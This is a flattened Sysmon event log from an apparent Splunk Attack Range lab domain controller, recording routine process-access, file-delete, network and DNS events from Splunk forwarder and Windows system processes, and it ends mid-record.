16:53:04.200{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238022Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:04.200{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238021Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:04.200{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238020Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:04.200{05ADC7E1-229D-6039-0500-00000000AD01}6361168C:\Windows\system32\csrss.exe{05ADC7E1-6D70-603E-8FAA-00000000AD01}12968C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002238019Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:04.200{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238018Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:04.200{05ADC7E1-FB1F-603C-5979-00000000AD01}64843560C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{05ADC7E1-6D70-603E-8FAA-00000000AD01}12968C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002238017Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:04.201{05ADC7E1-6D70-603E-8FAA-00000000AD01}12968C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{05ADC7E1-229D-6039-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002238016Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:04.064{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=37D5EB75214E2F5CF9ABCED78CE8A002,SHA256=936C349833EC146A6DF0968721DCC0BD751C0ED6A64D2E5C61601A1E09F44368,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002238038Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:55.212{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60132-false10.0.1.12-8000- 23542300x80000000000000002238037Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:05.309{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0FCD951363A8B2AAB7034A0373936B80,SHA256=096FBDA513DBE85D81EA45AC39FDA95F1B89A4291988C7B3C6A6BEA943D4C1AF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002238036Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:05.090{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B8750DD2320534F9854F35A857368363,SHA256=2B1DFC99AF77B9DCE53B973C1841616BE3CF27A65F4422149CC8FA7C05AB1A89,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002238035Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:05.074{05ADC7E1-6D70-603E-90AA-00000000AD01}1521215508C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002238040Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:06.340{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B48F3F7E7652F536D9A3A8BB8CA300E4,SHA256=9ACBE2D673A49B057BD5774380E4058BFB2C818A9E57A0E14B3EDACF6A1183C9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002238039Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:06.340{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=607D94C4F348E4AC7DF12C08F377F67F,SHA256=1D658B5DDBEF992D0B4F5DF65E63A13C7AEDC6C3ACA402FA48BC8E83482B0E3F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002238042Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:07.374{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FB3AA61446CAC65F60A4C8F664155DE2,SHA256=9E113319205D150C2AEE1CFC2F379CD106DF6A9BE783B7C0C3C84C8914CC584A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002238041Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:07.356{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=437CE3535585BD25DAF66A9AC168DB1D,SHA256=80C3F36DB3B90959E51E585F19FE4C78BE99626817DE49BDB620F4EA357AD96F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002238043Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:08.374{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EDC5837708EC429FB5C434D50AA66490,SHA256=EB05417FFD707DAC5B76E2C4BDB3CFFAD0C3056E96012315773E63D7245630C3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002238044Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:09.419{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=38FEA1B4FE118DB198451F7895FF89E1,SHA256=0A5E286DED3D62B213CD1F10CE875CDBE84C08217AD625E7C95BA749FEBAB5E8,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002238047Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:00.243{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60133-false10.0.1.12-8000- 23542300x80000000000000002238046Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:10.434{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3FEE93E0D2C07FB97198C37C365ED600,SHA256=67D18E8F46C335CBB1BB9B1727A91CD8C5E167E82E41E52FB319C3D2B8EB7BC6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002238045Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:10.106{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6E2D614FBFE8060BB87E95A81A5649A7,SHA256=7B5674DA044EC1880C670C66B8E6070FA0A3D5F2AFED8C63C1A3BF5CE55E68F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002238049Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:11.966{05ADC7E1-229F-6039-1100-00000000AD01}1152NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=D8B31D3EE4F848230B6E7CA8EC3C221F,SHA256=B4F5FACE5CF3DA99BA37206D5D92BC0EBC8BA190861F8ACC61A2C3653D59E63B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002238048Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:11.469{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6EE5019A521A762DE4A8B8EBDE79372B,SHA256=A89E24009B4154E19EE1B29619A5914FF769DCE89BA44EBA8CF5F7AA3320BD0E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002238050Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:12.497{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF78B2701E3794501EA253F5D480A8C0,SHA256=CAACA4A1C5743E5A4633C8265E20D9939354AAD235511B6D3F622EC61D51D2E2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002238051Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:13.528{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=309EB45893945DA3BD879D26AE570897,SHA256=9A6075D4679E79922DFBA18F08CE6A2701896A28FF5E27B16FF14F4D4A73D282,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002238053Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:14.544{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E0605061C15A6921FE5662D426703664,SHA256=67171BC594C4B0D3F11F68282D8855BECB4EEE44EA27F8259DEB439CDAEA668E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002238052Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:14.387{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=883F1600FE906E07B4EF3A34E45898D0,SHA256=709E9E97DE8223E3D27BF1668E5F2DBA94BBBAA1494E941287D194EDACC63F93,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002238055Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:05.305{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60134-false10.0.1.12-8000- 23542300x80000000000000002238054Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:15.562{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=25AEC27C0AE71EAD34AF27953578C581,SHA256=867267C804D2C41AEBE0FA8D8CEB2C13152117817CE9BE3144F61BAE5CD7C989,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002238058Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:06.367{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local57729- 23542300x80000000000000002238057Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:16.590{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3E28F02BD7AC708DEEAA314DA3B513B9,SHA256=F4EE7FB070CA8652088D066679DF1FA81D42E78F2F936A8E6325523D68E14F34,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002238056Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:16.247{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E850A51EF5877B015BF6F2314CC1FF8C,SHA256=E0BBD3257F0B4BE1980D27DAEDF127F57DFE81C68B877F8B5AB64DBAAC49C50B,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002238060Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:07.382{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-974.attackrange.local53domainfalse127.0.0.1win-dc-974.attackrange.local57729- 23542300x80000000000000002238059Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:17.622{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=55B951FEFB2598AF6DAEC7E583FB1064,SHA256=CA2113754E352ED1EDD20077062CB5AD8013C9627AC61923B772D0E69ECBEAAC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002238061Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:18.684{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EEAE42CFA35F41280A06FE6AC2BBC4DC,SHA256=F2F0ED64FC1B543FE5B72E4230955C2E0628811DEBFE7B1EAEE5B0F94C7DE66A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002238065Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:09.699{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruetruefe80:0:0:0:0:ffff:ffff:fffe-61757-true2001:500:2f:0:0:0:0:ff.root-servers.net53domain 354300x80000000000000002238064Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:09.695{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local53792- 23542300x80000000000000002238063Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:19.716{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ED132F55C744BC760D8EECC2540A1847,SHA256=0C593090E5D367B1AE6900C95C3E50DD0DECC1CE6157F112D72ED37F5B860049,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002238062Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:19.622{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=120491190F2F8582D90180C0C6751855,SHA256=12FF9466EF6D35907707E1100067A3348F28242975470B9351EA119333471C0D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002238068Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:10.711{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-974.attackrange.local53domainfalse127.0.0.1win-dc-974.attackrange.local53792- 354300x80000000000000002238067Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:10.336{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60135-false10.0.1.12-8000- 23542300x80000000000000002238066Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:20.747{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C34047D3A09A464EA7E0D77557BACEA1,SHA256=095F7DF59CE9B440F3DEFD9C0384BD46452E42AF1714EEFAE6BF8AD9D8A2AD9D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002238069Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:21.809{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=96C0F6C58DD7ED1583B6CFD64CC6ED55,SHA256=64CE60E376F948062729466B099BB3B60E8DD519C265A808DBA58A36B2C198B2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002238070Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:22.825{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EB8D56414184A83C19C9CAA8383B2EC7,SHA256=435F74AA65E88DE796E1CEF211E6E008FE0E145616440D16D32CD81F35E23681,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002238071Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:23.856{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B2D6DD88E592266D9794F5C6403D76C1,SHA256=6AE44C918030D72318BFD85E1BCDA926853B61C16392FC4069990458994EDD34,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002238073Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:24.856{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=32B3937A9FA14DAF2591558CED2992FC,SHA256=5BB757808A393C0A6FF57D41CA97C6613F523427A510B62D2E55CC2963BC0D6A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002238072Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:24.294{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 